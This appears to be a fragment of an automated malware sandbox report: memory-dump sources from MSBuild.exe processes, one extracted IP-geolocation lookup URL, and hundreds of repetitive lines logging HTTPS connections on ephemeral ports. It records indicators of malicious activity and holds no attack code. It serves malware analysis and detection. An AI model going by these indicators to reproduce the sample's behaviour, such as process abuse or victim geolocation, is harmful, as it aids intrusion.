            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80$
            Source: unknownNetwork traffic detected: HTTP traffic on port 56812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56903 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56891 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
            Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
            Source: unknownNetwork traffic detected: HTTP traffic on port 56906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
            Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
            Source: unknownNetwork traffic detected: HTTP traffic on port 56884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
            Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
            Source: unknownNetwork traffic detected: HTTP traffic on port 56861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
            Source: unknownNetwork traffic detected: HTTP traffic on port 56929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 56930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
            Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
            Source: unknownNetwork traffic detected: HTTP traffic on port 56918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
            Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56908
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56909
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56903
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56904
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
            Source: unknownNetwork traffic detected: HTTP traffic on port 56883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56901
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
            Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
            Source: unknownNetwork traffic detected: HTTP traffic on port 56827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
            Source: unknownNetwork traffic detected: HTTP traffic on port 56838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
            Source: unknownNetwork traffic detected: HTTP traffic on port 56798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
            Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
            Source: unknownNetwork traffic detected: HTTP traffic on port 56848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56832
            Source: unknownNetwork traffic detected: HTTP traffic on port 56887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
            Source: unknownNetwork traffic detected: HTTP traffic on port 56921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56848
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56849
            Source: unknownNetwork traffic detected: HTTP traffic on port 56898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56846
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
            Source: unknownNetwork traffic detected: HTTP traffic on port 56829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
            Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
            Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
            Source: unknownNetwork traffic detected: HTTP traffic on port 56853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56859
            Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
            Source: unknownNetwork traffic detected: HTTP traffic on port 56805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56861
            Source: unknownNetwork traffic detected: HTTP traffic on port 56818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56865
            Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56871
            Source: unknownNetwork traffic detected: HTTP traffic on port 56886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 56830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
            Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56914
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56915
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56916
            Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56917
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
            Source: unknownNetwork traffic detected: HTTP traffic on port 56807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
            Source: unknownNetwork traffic detected: HTTP traffic on port 56839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
            Source: unknownNetwork traffic detected: HTTP traffic on port 56816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56929
            Source: unknownNetwork traffic detected: HTTP traffic on port 56934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56925
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56926
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56928
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56924
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
            Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56920
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
            Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
